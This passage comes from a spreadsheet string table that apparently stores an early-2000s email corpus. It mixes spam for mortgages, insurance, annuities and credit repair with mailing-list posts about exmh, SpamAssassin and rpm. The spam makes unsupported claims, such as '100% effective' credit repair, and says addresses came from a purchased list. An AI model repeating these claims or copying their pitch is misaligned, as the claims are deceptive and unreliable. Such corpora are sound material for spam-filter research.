 onal&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;and friendly service you will experience.&amp;nbsp;=
  We will&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;answer your questions with no obligation.&lt;/b&gt;&lt;/=
 font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.myratedoctor.com"&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;CLICK H=
 ERE&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;We have rates as low as 4.65% and Loans for all=
 &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;types of people and situations.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;For those of you who have a mortgage and have b=
 een&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;turned down we can still save you around $30,00=
 0.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;&lt;a href=3D"http://www.myratedoctor.com"&gt;CLICK H=
 ERE&lt;/a&gt; for a FREE, friendly
 quote.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;If you no longer wish to receive our offers and updates &lt;a href=3D"mail=
 to:ahldebt2@excite.com?subject=3Dremove"&gt; click here&lt;/a&gt;&amp;nbsp;&lt;br&gt;
  and we will promptly honor your request.&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; On Mon, 9 Sep 2002, Rick Baartman wrote:
 &gt; Thanks Tom and Jacob. The above works, but without the double quotes: i.e. 
 &gt; 
 &gt; sh -c 'for f in `folders -recurse -fast` ; do sortm +"$f" ; done'
 &gt; 
 But there is a problem with making changes outside of exmh: the .xmhcache files 
 don't get updated. This is dangerous; I have to remember to re-scan each folder 
 I enter. Is there a safeguard for this?
 --
 rick
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">It's only 64kbps, but http://noise.ktru.org/ can be tasty.  Presently 
 playing Fille Qui Mousse, Collage in Progress, and other happy nibbles.
 Sounds a bit like The Avalanches, but that will change soon.
 Cheers,
 Wayne
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Lowest life insurance rates available!                                                   pzcby
</t>
  </si>
  <si>
    <t xml:space="preserve">Lowest rates available for term life insurance! Take a moment and fill out our online form to see the low rate you qualify for. Save up to 70% from regular rates! Smokers accepted! http://www.newnamedns.com/termlife/ 
 Representing quality nationwide carriers. Act now!
 ---------------------------------------
 To easily remove your address from the list, go to: 
 http://www.newnamedns.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Multi-Generational Sales Kit
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C23333.1932BF20
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  FREE Multi-Generational Sales Kit
  Just ask for our Simple 7 annuity product kit!
   _____  
  Simple Seven(tm) Product Highlights
  	Short 7 Year Surrender Period	 
  	2% Premium Bonus on First Year Premium	 
  	Free Multi-Generational Sales Kit (Stretch IRA Concept) 	
  	75% Participation Rate	 
  	Issue Ages 0-90 Qualified or Non-Qualified	 
  	No Fees, Margins or Spreads	 
   _____  
 Call today for more information!
  800-245-2801
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	 	
 Address:	  	
 City:	    State:    Zip:  	
 E-mail:	  	
 Phone:	  	
  DNA Brokerage
 FOR AGENT USE ONLY. NOT INTENDED FOR CONSUMER SOLICITATION PURPOSES. The
 Simple Seven is issued on forms LC126A (group cert) or LS126A
 (individual contract) by North American Company for Life and Health
 Insurance, Chicago, Illinois. This product and some of its features is
 not available in all states.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------=_NextPart_000_0007_01C23333.1932BF20
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Free Multi-Generational Sales Kit&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF" bordercolor=3D"#000000" =
 border=3D"1"&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;
       &lt;img src=3D"http://iiq.us/images/dna/20020712-101.gif" =
 alt=3D"FREE" width=3D"175" height=3D"88"&gt;&lt;img =
 src=3D"http://iiq.us/images/dna/20020712-102.gif" =
 alt=3D"Multi-Generational Sales Kit" width=3D"375" height=3D"88"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/dna/20020712-104.jpg" =
 width=3D"416" height=3D"310"&gt;=20
       &lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/dna/20020712-6.gif" width=3D"540" =
 height=3D"46" alt=3D"Just ask for our Simple 7 annuity product kit!"&gt;=20
       &lt;br&gt;
       &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/images/dna/20020712-501.gif" =
 width=3D"272" height=3D"44" alt=3D"Simple Seven(tm)"&gt;&lt;img =
 src=3D"http://iiq.us/images/dna/20020712-502.gif" width=3D"242" =
 height=3D"44" alt=3D"Product Highlights"&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;img src=3D"http://iiq.us/images/dna/20020712-2.gif" =
 width=3D"21" height=3D"23"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%"&gt;&lt;b&gt;&lt;font size=3D"3" =
 color=3D"#000000"&gt;Short 7 Year Surrender Period&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;img src=3D"http://iiq.us/images/dna/20020712-2.gif" =
 width=3D"21" height=3D"23"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%"&gt;&lt;b&gt;&lt;font size=3D"3" =
 color=3D"#000000"&gt;2% Premium Bonus on First Year Premium&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;img src=3D"http://iiq.us/images/dna/20020712-2.gif" =
 width=3D"21" height=3D"23"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%"&gt;&lt;b&gt;&lt;font size=3D"3" =
 color=3D"#000000"&gt;Free Multi-Generational Sales Kit (Stretch IRA =
 Concept) &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;img src=3D"http://iiq.us/images/dna/20020712-2.gif" =
 width=3D"21" height=3D"23"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%"&gt;&lt;b&gt;&lt;font size=3D"3" =
 color=3D"#000000"&gt;75% Participation Rate&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;img src=3D"http://iiq.us/images/dna/20020712-2.gif" =
 width=3D"21" height=3D"23"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%"&gt;&lt;b&gt;&lt;font size=3D"3" =
 color=3D"#000000"&gt;Issue Ages 0-90 Qualified or =
 Non-Qualified&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;img src=3D"http://iiq.us/images/dna/20020712-2.gif" =
 width=3D"21" height=3D"23"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%"&gt;&lt;b&gt;&lt;font size=3D"3" =
 color=3D"#000000"&gt;No Fees, Margins or Spreads&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font size=3D"2"&gt;&lt;b&gt;Call today for more information!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/dna/20020712-3.gif" =
 width=3D"533" height=3D"78" alt=3D'800-245-2801'&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#003300"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;Please fill =
 out the form below for more information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"6" valign=3D"middle" =
 align=3D"center" width=3D"11%"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Address:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"address" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;b&gt;&lt;font size=3D"2"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &amp;nbsp;&amp;nbsp;State:=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                           &amp;nbsp;&amp;nbsp;Zip:=20
                           &lt;input type=3D"text" name=3D"ZipCode" =
 size=3D"5"&gt;
                           &lt;/font&gt;&lt;/b&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"10%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"34%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"marketing@dnabrokerage.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"DNA Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"center"&gt;
             &lt;br&gt;&lt;img src=3D"http://iiq.us/images/dna/20020712-7.gif" =
 width=3D"540" height=3D"113" alt=3D"DNA Brokerage"&gt;&lt;br&gt;&lt;br&gt;
             &lt;p align=3D"left"&gt;&lt;font size=3D"1"&gt;FOR AGENT USE ONLY. NOT =
 INTENDED FOR=20
               CONSUMER SOLICITATION PURPOSES. The Simple Seven is issued =
 on forms=20
               LC126A (group cert) or LS126A (individual contract) by =
 North American=20
               Company for Life and Health Insurance, Chicago, Illinois. =
 This product=20
               and some of its features is not available in all =
 states.&lt;/font&gt;&lt;/p&gt;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&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_0007_01C23333.1932BF20--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 9.05% Guaranteed Annuity @ 8% Commission
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_8A2A7_01C1FC44.0A86D9F0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  8% Annuity Comissions!
  From the TBA Annuity Doctor
  8% Commission=0A=
 9.05% year one=0A=
 5.05% guaranteed years 2-6=0A=
 A++ Best
 Carrier
  Guaranteed
  	 =09
  Call Today for Details!
 Click Here for a Test Drive!
 &lt;http://nettrac.ipipeline.com/quotes/request/ann_qt.asp?gaid=3D0162&gt;=20
  =20
  800-624-4502 ext. 13=09
 ? or ?
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 Don't forget -- we also do Impaired Risk Life!
 www.TBA.com &lt;http://www.tba.com&gt;=20
  =20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_8A2A7_01C1FC44.0A86D9F0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;9.05% Guaranteed Annuity @ 8% Commission&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#3399cc"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-101c.jpg" width=3D"550" =
 height=3D"67" alt=3D"8% Annuity Comissions!"&gt;&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-102c.gif" width=3D"550" =
 height=3D"54" alt=3D"From the TBA Annuity Doctor"&gt;&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-103c.gif" width=3D"550" =
 height=3D"143" alt=3D"8% Commission&amp;#10;9.05% year one&amp;#10;5.05% =
 guaranteed years 2-6&amp;#10;A++ Best Carrier"&gt;&lt;br&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-5.gif" width=3D"223" =
 height=3D"32" alt=3D"Guaranteed"&gt;&lt;br&gt;
                   &lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-106c.gif" width=3D"223" =
 height=3D"93"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-105c.gif" width=3D"327" =
 height=3D"125"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-107c.gif" alt=3D"Call =
 Today for Details!"&gt;&lt;br&gt;
             &lt;br&gt;
             &lt;a =
 href=3D"http://nettrac.ipipeline.com/quotes/request/ann_qt.asp?gaid=3D016=
 2"&gt;&lt;img src=3D"http://63.211.81.87/images/tba/20020509-4.gif" =
 width=3D"500" height=3D"77" border=3D"0" alt=3D"Click Here for a Test =
 Drive!"&gt;&lt;/a&gt;&lt;br&gt;
             &amp;nbsp;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/tba/20020509-2.gif" =
 width=3D"550" height=3D"68" alt=3D"800-624-4502 ext. 13"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&amp;#151; or &amp;#151;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Please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value=3D"kkinnane@tba.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"TBA Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;font size=3D"3" color=3D"#FFFFFF"&gt;&lt;i&gt;&lt;b&gt;Don't forget -- we =
 also do Impaired Risk Life!&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
             &lt;a href=3D"http://www.tba.com"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-3.gif" width=3D"368" =
 height=3D"106" border=3D"0" alt=3D"www.TBA.com"&gt;&lt;/a&gt;&lt;br&gt;
             &amp;nbsp; &lt;/font&gt;=20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&lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_8A2A7_01C1FC44.0A86D9F0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] False Positive of the Week
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Bob Sully said:
 &gt; Spamassassin (2.30) has been tossing my daily LogWatch (3.3) reports into 
 &gt; the spam bucket.  A recent one generated the folowing hits: ....
 fixed in CVS I think, or at least my logwatches get through fine.  If it
 is not fixed in CVS, then report it, using the correct bug-reporting
 procedure:
     1. open a Bugzilla bug. http://bugzilla.SpamAssassin.org/
     2. attach a sample mail message *as an attachment* with all
     headers intact
 --j.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</si>
  <si>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URL: http://www.newsisfree.com/click/-0,8613675,159/
 Date: 2002-10-06T18:12:45+01:00
 This feature, excerpted from Wolfgang Engel's ShaderX book from Wordware 
 Publishing, presents a simple shader trick that performs a good per pixel 
 approximation of a non-integer power function. The technique works for input 
 values between 0 and 1 and supports large exponents. The presented shader does 
 not require any texture look-up and is scalable, making it possible to spend 
 more instructions in order to decrease the error or to reach greater exponents.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "requires:" and relational operators
</t>
  </si>
  <si>
    <t xml:space="preserve">Halloechen!
 I have
 Requires: saxon &gt;= 6.5.1
 Conflicts: saxon &gt;= 7
 in my spec file.  But apparently rpm ignores all version numbers. So,
 Requires: saxon &gt;= 6.5.1
 # Conflicts: saxon &gt;= 7
 would install even with saxon-3.0.0, and
 # Requires: saxon &gt;= 6.5.1
 Conflicts: saxon &gt;= 7
 wouldn't install even with saxon-6.5.2.  What could be the reason
 for this?
 Tschoe,
 Torsten.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Friday July 19
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.
 Software
     JPEGs are not free: Patent holder pursues IP grab
     And Sony's already coughed up
         http://www.theregister.co.uk/content/4/26272.html
     Mac users outraged at iTools, upgrade taxes
     Read my lips: pony up
         http://www.theregister.co.uk/content/4/26269.html
     Amazon opens web services kimono
     But where's Henry Raddick?
         http://www.theregister.co.uk/content/4/26267.html
 Personal Hardware
     Hitachi creates splash with water cooled P4 notebook
     Well no, actually. The idea is it doesn't splash...
         http://www.theregister.co.uk/content/54/26273.html
 Semiconductors
     AMD chalks up huge loss, admits to extended red zone
     AMD up agin it may be a sign the economy's returning to normal...
         http://www.theregister.co.uk/content/3/26256.html
 Internet
     Fair Use advocates silenced by Big Brother
     Commerce Dept. doesn't want to hear it
         http://www.theregister.co.uk/content/6/26275.html
     Net access at work is a perk, say employees
     Or not, as the case may be
         http://www.theregister.co.uk/content/6/26270.html
     'Dotcom millionaire' pulls out of porn
     Benjamin Cohen refocuses 
         http://www.theregister.co.uk/content/6/26268.html
     Virgin.net pilots broadband
     Full launch in September
         http://www.theregister.co.uk/content/6/26262.html
     BT ordered to cut cost of Net access
     Don't you love it when Oftel talks tough?
         http://www.theregister.co.uk/content/6/26258.html
     Internet monopoly alert!
     Verisign up to its old tricks again
         http://www.theregister.co.uk/content/6/26254.html
     Copyright enforcer Ranger Online caught stealing content
     Do as we say, not as we do
         http://www.theregister.co.uk/content/6/26250.html
 Net Security
     Symantec buys SecurityFocus, Riptech, Recourse
     So that's who's got the cashflow...
         http://www.theregister.co.uk/content/55/26255.html
 Business
     Nokia shares slip on lowered estimates 
     Upsy-daisy
         http://www.theregister.co.uk/content/7/26271.html
     AOL "cooked books" as dot.com bubble burst
     Revenue "not of highest quality". Right
         http://www.theregister.co.uk/content/7/26264.html
     Redbus row rumbles on
     Cliff launches Portal of Discontent
         http://www.theregister.co.uk/content/7/26260.html
     Symantec buys SecurityFocus, Riptech, Recourse
     So that's who's got the cashflow...
         http://www.theregister.co.uk/content/7/26255.html
     Reading the runes of IBM's Q2s
     6 per cent down, but maybe good all the same
         http://www.theregister.co.uk/content/7/26253.html
 The Vulture Central Mailbag
     FoTW: Bad language breeds Bad language
     LettersC# barbs fall flat
         http://www.theregister.co.uk/content/35/26266.html
 Site News
     Cash'n'Carrion sinks claws into Nigerian 419 scam
     You read the email, you sent the cash, now wear the shirt
         http://www.theregister.co.uk/content/31/26259.html
 Bootnotes
     Deloitte Consulting rebrands as mineral water
     All hail Braxton!
         http://www.theregister.co.uk/content/28/26265.html
     Hello, I'd like to speak to Dr Really Evil please...
     404- Bond villain Not Found
         http://www.theregister.co.uk/content/28/26261.html
     Deloitte Consulting has Monday: on its mind
     More: rebranding: malarkey: from: the: wonderful: world: of: consultancy:
         http://www.theregister.co.uk/content/28/26257.html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</si>
  <si>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Robert Harley:
 &gt;It is perfectly obvious that (heterosexual) promiscuity is exactly, 
 &gt;precisely identical between males and females.
 Yeah, assuming approximately equal populations.
 But that obscures the different modes of
 promiscuity. Both the person who gives sex for
 money or power or companionship and the person
 who uses money and power and companionship to
 get sex are promiscuous, in the broadest sense
 of the word. But their motives and behavior are
 quite different.
 Langur monkeys were the example in the cited
 article. "Dominant males .. kill babies that
 are not their own." "The dominant male monkey
 .. seeks to defend his harem of females." But
 cozying up to the current dominant male isn't
 the best strategy for female langurs, because
 "dominant males are dethroned by rivals every
 27 months or so." "By mating with as many
 extra-group males as possible, female langurs
 ensure their offspring against infanticide,"
 by the male who is likely next to rule the
 roost.
 Maybe it's just me, but that doesn't paint a
 picture of carefree females engaged in joyously
 promiscuous couplings. The dom cab driver who
 is taking her two boy toys to New Orleans is a
 better picture of that. ;-)
 _________________________________________________________________
 Chat with friends online, try MSN Messenger: http://messenger.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fix your credit... Online.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;P ALIGN=3DCENTER&gt;&lt;FONT  COLOR=3D"#ff0000" SIZE=3D3 PTSIZE=3D12 FAMIL=
 Y=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;Is Your Credit A Mess?&lt;/b&gt;&lt;/F=
 ONT&gt;&lt;B&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;BR&gt;
 Do you want Perfect Credit again?&lt;BR&gt;
 Wouldn't it be nice to easily get loans for cars, boats, and houses?&lt;/font=
 &gt;&lt;/B&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: =
 #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"=
 0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;P ALIGN=3DLEFT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"=
 BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D=
 "Arial" LANG=3D"0"&gt;&lt;BR&gt;
   &lt;B&gt;We have the Solution!!&lt;/B&gt; &lt;B&gt;ONLINE CREDIT REPAIR!!!&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
   Now you can clean up and repair your bad credit online from the convenie=
 nce 
   of your home computer. Our program is &lt;B&gt;100% effective&lt;/B&gt; for helping =
 you 
   fix your credit, and &lt;B&gt;you can watch your credit with real-time updates=
 &lt;/B&gt;.&lt;B&gt; 
   &lt;/B&gt;Its been called the #1 program for fixing bad credit!&lt;BR&gt;
 &lt;BR&gt;
   &lt;/font&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COL=
 OR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=
 =3D"0"&gt;&lt;B&gt;&lt;A HREF=3D"http://www.webcredit2002.com/?CID=3D1010&amp;amp;MID=3D11=
 002"&gt;Click 
   Here for FREE information Now!&lt;/A&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
   &lt;/b&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGRO=
 UND-COLOR: #ffffff" SIZE=3D1 PTSIZE=3D8 FAMILY=3D"SANSSERIF" FACE=3D"Verda=
 na" LANG=3D"0"&gt;&lt;/font&gt;&lt;/B&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D=
 "BACKGROUND-COLOR: #ffffff" SIZE=3D1 PTSIZE=3D8 FAMILY=3D"SANSSERIF" FACE=3D=
 "Verdana" LANG=3D"0"&gt;Your 
   email address was obtained from a purchased list, Reference # 1010-11002=
 &amp;nbsp; 
